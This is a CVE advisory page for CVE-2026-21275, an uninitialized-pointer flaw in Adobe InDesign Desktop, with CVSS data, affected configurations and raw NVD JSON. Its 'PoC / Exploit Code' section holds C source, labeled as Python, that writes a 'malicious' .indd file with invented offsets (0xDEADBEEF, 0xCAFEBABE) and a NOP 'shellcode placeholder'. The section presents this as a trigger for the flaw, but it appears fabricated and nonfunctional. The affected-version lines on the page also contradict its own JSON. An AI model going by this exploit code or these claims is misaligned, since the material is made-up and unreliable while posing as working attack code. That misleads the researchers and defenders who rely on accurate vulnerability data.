Security Vulnerability Report
中文
CVE-2026-21275 CVSS 7.8 HIGH

CVE-2026-21275

Published: 2026-01-13 19:16:25
Last Modified: 2026-01-14 19:28:03
Source: [email protected]

Description

InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe InDesign Desktop < 21.0
Adobe InDesign Desktop < 19.5.5
Adobe InDesign Desktop 21.0
Adobe InDesign Desktop 19.5.5及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21275 PoC - InDesign Desktop Uninitialized Pointer Access // This PoC demonstrates the vulnerability trigger mechanism // Note: This is for educational and security research purposes only #include <stdio.h> #include <stdlib.h> #include <string.h> // Malicious InDesign file structure to trigger uninitialized pointer typedef struct { char header[8]; // File signature unsigned int version; // Version number unsigned int flags; // Malformed flags unsigned long offset1; // Crafted offset pointing to uninitialized memory unsigned long offset2; // Secondary offset char payload[256]; // Payload data } MaliciousINDD; void create_malicious_file(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { printf("Failed to create file\n"); return; } MaliciousINDD malicious = {0}; // InDesign file signature memcpy(malicious.header, "\x06\x06\xED\xF5\xD8\x1D\x46\xE5", 8); malicious.version = 0x15000000; // Version 21.0 trigger malicious.flags = 0xFFFFFFFF; // Malformed flags malicious.offset1 = 0xDEADBEEF; // Points to uninitialized pointer location malicious.offset2 = 0xCAFEBABE; // Shellcode placeholder for code execution unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; memcpy(malicious.payload, shellcode, sizeof(shellcode)); fwrite(&malicious, sizeof(MaliciousINDD), 1, fp); fclose(fp); printf("Malicious InDesign file created: %s\n", filename); printf("Open this file with vulnerable InDesign version to trigger CVE-2026-21275\n"); } int main() { printf("CVE-2026-21275 PoC Generator\n"); printf("=================================\n\n"); create_malicious_file("CVE-2026-21275-malicious.indd"); printf("\n[!] Warning: This PoC is for authorized security testing only\n"); printf("[!] Unauthorized exploitation of this vulnerability is illegal\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21275", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:25.030", "lastModified": "2026-01-14T19:28:03.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones de InDesign Desktop 21.0, 19.5.5 y anteriores están afectadas por una vulnerabilidad de Acceso a Puntero No Inicializado que podría resultar en ejecución de código arbitrario en el contexto del usuario actual. La explotación de este problema requiere interacción del usuario en el sentido de que la víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-824"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.1", "matchCriteriaId": "7BFF153C-8825-407C-AF58-4AC567601D68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0", "versionEndExcluding": "21.1", "matchCriteriaId": "7BF7435F-7314-440A-89A8-8C3D4CCCDD63"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/indesign/apsb26-02.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.